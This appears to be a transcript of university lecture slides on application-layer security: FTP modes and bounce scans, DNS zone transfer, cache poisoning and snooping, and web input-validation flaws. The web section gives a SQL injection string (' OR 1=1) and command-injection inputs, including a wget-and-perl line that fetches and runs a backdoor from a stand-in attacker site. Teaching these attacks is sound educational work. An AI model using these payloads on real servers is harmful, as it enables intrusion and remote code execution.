Application Layer Security

Application Layer Security Lecture 8 Supakorn Kungpisdan supakorn@mut.ac.th NETE4630

Outline • FTP Security • DNS Security • Web Application Security NETE4630

FTP Security Issues • All traffic is transmitted in clear text • Weak configuration on FTP allows brute force and dictionary attacks • Anonymous access may be enabled to FTP server • If file permissions are not set, an anonymous user may be able to read, overwrite, or delete files, leading to loss of confidentiality, integrity, and availability of data • If anonymous access is being used on a server, make sure that the proper restrictions are enforced for this user NETE4630

Active FTP • The client connects from a random unprivileged port (N > 1023) to the FTP server's command port, port 21. The client also sends the FTP command PORT N+1 from port N to port 21 at the FTP server. The client then starts listening to port N+1 • Server returns the response from port 21 to port N at the client • The server will then connect back to the client's specified data port from its local data port (port 20) to the client at port N+1 Ref: http://slacksite.com/other/ftp.html NETE4630

Firewall VS Active FTP • From the server-side firewall's standpoint, to support active mode FTP the following communication channels need to be opened: • FTP server's port 21 from anywhere (Client initiates connection) • FTP server's port 21 to ports > 1023 (Server responds to client's control port) • FTP server's port 20 to ports > 1023 (Server initiates data connection to client's data port) • FTP server's port 20 from ports > 1023 (Client sends ACKs to server's data port) NETE4630

Active FTP (cont.) debug Client port = (14*256)+178 = 3762 Letters in red shows client input Letters in black shows server output NETE4630

Active FTP (cont.) • The client's command port contacts the server's command port (port 21) and sends the command PORT 1027 (N+1). • The server sends an ACK back from its port 21 to the client's command port (port 1026  port N). • the server initiates a connection on its local data port (port 20) to the data port the client specified earlier (port 1027). • The client sends an ACK back from port 1027 to the server port 20. NETE4630

Problems of Active FTP • The FTP client doesn't make the actual connection to the data port of the server • The FTP client simply tells the server what port it is listening on (N+1) and waits for the server to connect back to the specified port on the client. • From the client-side firewall, this appears to be an outside system initiating a connection to an internal client • This connection may be blocked • Because the server initiates the data connection, the server may connects to different client NETE4630

Passive FTP • To solve the problem of active FTP, use passive FTP • When opening an FTP connection, the client opens two random unprivileged ports locally (N>1023 and N+1). • The port N contacts the server on port 21, but instead of then issuing a PORT command and allowing the server to connect back to its data port, the client will issue the PASV command. • The server then opens a random unprivileged port (P > 1023) and sends the PORT P command back to the client. • The client then initiates the connection from port N+1 to port P on the server to transfer data. NETE4630

Firewall VS Passive FTP • From the server-side firewall's standpoint, to support passive FTP, the following communication channels need to be opened: • FTP server's port 21 from anywhere (Client initiates connection) • FTP server's port 21 to ports > 1023 (Server responds to client's control port) • FTP server's ports > 1023 from anywhere (Client initiates data connection to random port specified by server) • FTP server's ports > 1023 to remote ports > 1023 (Server sends ACKs (and data) to client's data port) NETE4630

Passive FTP (cont.) Server specifies port number NETE4630

Passive FTP • The client contacts the server on the command port (port N=1026) and issues the PASV command. • The server then replies with PORT 2024, telling the client which port it is listening to for the data connection. • The client then initiates the data connection from its data port (N+1=1027) to the specified server data port (port 2024). • The server sends back an ACK (from its port 2024) to the client's data port (port 1027). You can see that client initiates data connection with FTP server  will not be blocked by the firewall NETE4630

Problems of Passive FTP • The FTP server needs to allow remote connection to high numbered ports on the server. • Fortunately, many FTP daemons, including the popular WU-FTPD allow the administrator to specify a range of ports which the FTP server will use. • Some FTP clients do (or do not) support passive mode. NETE4630

FTP Bounce Scan • The FTP bounce attack uses a third workstation to act as a proxy between the nmap host and the destination station. • With passive FTP, a user could send a PORT command to an FTP server that would direct the data towards a completely different host! • The FTP bounce attack takes advantage of these poorly-configured FTP servers (no control over ranges of FTP ports) • The data is BOUNCED from FTP server to target host NETE4630

FTP Bounce Scan (cont.) Closed port Open port NETE4630

Advantages of FTP Bounce Scan • FTP bounce attack can scan "through" a firewall. • The FTP bounce attack uses standard FTP functionality. Nmap does not require specialized packet configurations or changes to the FTP protocol. • Therefore, the FTP bounce attack does not require any privileged access. NETE4630

Disadvantages of FTP Bounce Scan • FTP bounce attack relates to the availability of an FTP server that allows a PORT command to redirect the data connection to a third device. • Most FTP servers have their default configuration to protect against this use of the PORT command NETE4630

Other FTP Bounce Attack • When using active FTP, a client uses the PORT command to specify the IP address and port number that the server should connect to for data connection • An attacker with access to an FTP server can bounce through the server by specifying someone else’s IP address NETE4630

Domain Name System • DNS is a distributed database that holds information for mapping between host names to IP addresses • DNS uses both UDP and TCP. • UDP is typically used for queries, unless the lookup or response is greater than 512 bytes • TCP is used for lookups and for zone transfer • Integrity and availability of DNS is critical for the health of the Internet. It is used in conjunction with almost every other protocol on the Internet • Availability was considered while designing DNS, however, security was not NETE4630

DNS Request NETE4630

DNS Response NETE4630

DNS Lookup Process 1 2 Host A’s Authoritative name server Host A • Host A sends a request to resolver (at host A). It checks the local cache and may check hosts file • The resolver at Host A forwards the request to its authoritative name server NETE4630

DNS Non-recursive Query 1 Host A’s Authoritative name server 2 3 Host B’s Authoritative name server 4 Host A Host B 5 3. Find the address of authoritative name server of the requested domain and returns its address to the resolver NETE4630

DNS Recursive Query 1 Host A’s Authoritative name server 2 5 Host B’s Authoritative name server 3 Host A Host B 4 3. The server finds the address of authoritative name server of the requested domain, passes the request on to the server, and returns a response to the resolver NETE4630

DNS Hierarchy (Recursive Query) .com TLD server 5 4 3 6 7 2 What happens if (2) is recursive query? 1. Recursive query 2. non-recursive query 1 8 NETE4630

DNS Utilities • Most OSes come with a tool called nslookup, capable of querying DNS servers for various types of information • The dig tool coming with UNIX has similar capabilities NETE4630

Name-to-IP Lookup NETE4630

MX Lookup with nslookup NETE4630

DNS Security Issues • DNS is lack of authentication and integrity checking • Due to the lack of authentication, attackers can spoof DNS messages to perform a variety of attacks • Due to the lack of integrity checking, attackers can intercept and modify messages in transit NETE4630

DNS Zone Transfer • For redundancy, administrators deploy both primary and secondary name servers that contain the same DBs • To keep the DBs synchronized with the primary name server, the secondary name server periodically connects to the primary name server on port 53/TCP and grabs the DNS records • This process is called a Zone Transfer NETE4630

DNS Information Gathering • DNS can provide a great deal of information about the target network and its hosts • One of the common insecure configurations with DNS is allowing anyone to perform zone transfers on one of a domain’s DNS servers • If an attacker can perform a zone transfer with the primary or secondary name servers for a domain, he/she will be able to view all DNS records for that domain • See a demo at http://www.mindterra.com/blog/?p=179 • Solved by specifying IP address that is allowed to perform the zone transfer or using Transaction Signature (TSIG) NETE4630

DNS Cache Poisoning • Both DNS client and servers cache responses for a period of time in order to increase performance and reduce network traffic • If an attacker can spoof a response for a DNS request, he/she may be able to contaminate the DNS cache with an incorrect record • This process is known as DNS cache poisoning • The only real defense built into DNS is the use of a randomTransaction ID and source port • Some versions of BIND use Transaction IDs that are not sufficiently random, and some use sequential Transaction IDs • BIND 9 Cache Poisoning NETE4630

DNS Cache Poisoning (cont.) • Attacker sends a large number of recursive requests for www.syngress.com to ns.hackthestack.com • ns.hackthestack.com forwards the requests to other name servers until it eventually sends the requests to Syngress’s name server ns.syngress.com • The ns.hackthestack.com is expecting to receive a large number of replies from ns.syngress.com. • Before they arrive, the attacker could flood ns.hackthestack.com with a large number of packets spoofed from ns.syngress.com • The attack will be successful if the spoofed packets have the correct combination of TID and port number NETE4630

DNS Cache Snooping • Recursion bit tells the DNS server whether it is recursive or non-recursive query • The remote DNS server may answer to queries for 3rd party domains which do not have the recursion bit set. • This may allow a remote attacker to determine which domains have recently been resolved via this name server, and therefore which hosts have been recently visited. Ref: www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf NETE4630

Possible Scenario • If an attacker was interested in whether your company utilizes the online services of a particular bank, they can use this attack to build a statistical model regarding company usage of the bank mentioned above. • This attack can also be used to find B2B partners, web-surfing patterns, external mail servers, and more... • Two techniques are available: using non-recursive queries and using recursive queries • Some DNS allows both types of queries, but some allows only recursive queries to be made NETE4630

DNS Cache Snooping with Non-recursive Queries Attacker queries to ns1.tvcabo.pt for www.sidestep.pt ns1.tvcabo.pt does not have the entry in local cache. It returns no answer, but gives a list of .pt TLD name server for further question NETE4630

DNS Cache Snooping with Non-recursive Queries (cont.) • The fact that ns1.tvcabo.pt does not have the entry in local cache means that all hosts under ns1.tvcabo.pt never communicates with www.sidestep.pt before. • Thus, this organization does not use services provided by www.sidestep.pt NETE4630

DNS Cache Snooping with Non-recursive Queries (cont.) • If the attacker executes the same query, check the response For this time, ns1.tvcabo.pt caches the entry, so it returns the answer NETE4630

DNS Cache Snooping with Recursive Queries • Used to determine with some degree of precision (not 100% sure) whether a given record is present in the cache • However, this will pollute the cache • If a given record is not present in the cache, it will be after the first query is made • This is because recursive query will always return the answer for the given record NETE4630

DNS Cache Snooping with Recursive Queries • Try to see if www.sidestep.pt was cached in ns1.tvcabo.pt • Query ns1.tvcabo.pt for www.sidestep.pt and record the TTL NETE4630

DNS Cache Snooping with Recursive Queries (cont.) • Then query to ns.sidestep.pt (Sidestep.com’s authoritative DNS) for www.sidestep.com and compare TTL NETE4630

DNS Cache Snooping with Recursive Queries (cont.) • TTL for www.sidestep.pt at ns1.tvcabo.pt (6458) is much lower than the initial TTL (86400) (the TTL at ns.sidestep.pt) • This is a good indicator that the answer was already cached at ns1.tvcabo.pt • Another way to look for cached responses is to observe the time that the query takes to process. • If the query time is approximately equal to the round trip time (RTT) of a packet to the server, then the answer might have been already present in the cache. NETE4630

A Safer BIND Configuration NETE4630

Attacking Web Applications • The majority of vulnerabilities are caused by a lack of proper input validation by the application before processing user-supplied data • This can allow attackers to disclose information about the site, steal information from backend DBs, or execute binary code on the web server S. Kungpisdan

SQL Injection • Many web applications rely on backend DBs for information storage and retrieval. • Sometimes a script will perform a DB query using input supplied from a web page, without verifying that the input does not contain any escape characters • Consider the following: • Query = “SELECT * FROM users WHERE username = ‘{$_POST[‘user’]}’ AND password = ‘{$_POST[‘pass’]}’ ”; • “SELECT * FROM users WHERE username = ‘bob’ AND password = ‘ ’ OR 1=1 ’’; S. Kungpisdan

Code Injection • Sometimes user-supplied strings are not properly checked for escape characters before being passed to commands as arguments • Consider a PHP script that takes a string supplied from web page form and passes it to the nslookup utility S. Kungpisdan

Code Injection (cont.) • If supply ;ls –la/, the script will execute the command nslookup;ls –la/, resulting in a listing of the root directory being printed out S. Kungpisdan

Code Injection (cont.) • wget and perl commands could be used to download and run a backdoor on the web server by supplying the following line to the script • ;wget http://attackersite/backdoor.pl;perl backdoor.pl S. Kungpisdan

Application Layer Security

Application Layer Security

Presentation Transcript

Application Layer Security Protocols

application layer

Application Layer

application layer

Application Layer

Application layer

Application layer

Application Layer Security

Application Layer

Application layer

Application Layer

Internet Security CSCE 813 Application Layer Security

Application Layer

Application Layer

Application layer

Application Layer

Application Layer

Application Layer

Application Layer

Application layer

Application Layer

Internet Security CSCE 813 Application Layer Security